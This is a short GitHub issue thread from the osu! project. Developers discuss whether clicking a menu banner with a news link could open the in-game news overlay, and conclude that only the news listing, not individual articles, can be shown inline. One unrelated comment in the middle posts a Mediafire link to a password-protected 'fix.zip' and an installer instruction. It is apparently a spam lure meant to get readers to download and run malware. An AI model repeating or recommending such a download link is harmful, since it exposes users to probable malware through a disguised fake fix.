### ISSUE TITLE
Clicking a menu banner with a news link should open to the news overlay

### ISSUE THREAD

**Issue by peppy** [ppy/osu#29622]
Currently it will open the website to the news page, but we already support this inline. Same should be considered for wiki links.

**Comment by bdach** [comment]
We don't support display of news *articles* inline, we only can display the news *listing*. Is that what you mean? If so, then it will take two clicks to open a news article (one on the banner will open the listing scrolled to the post, the second on the listing to open the post) - is that ok?

News posts of late feature large amounts of custom css/html and we can't display that (and I'm not sure we ever be well be able to).

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by peppy** [comment]
Hmm, I guess I was mistaken, thought it was already possible (minus html elements).
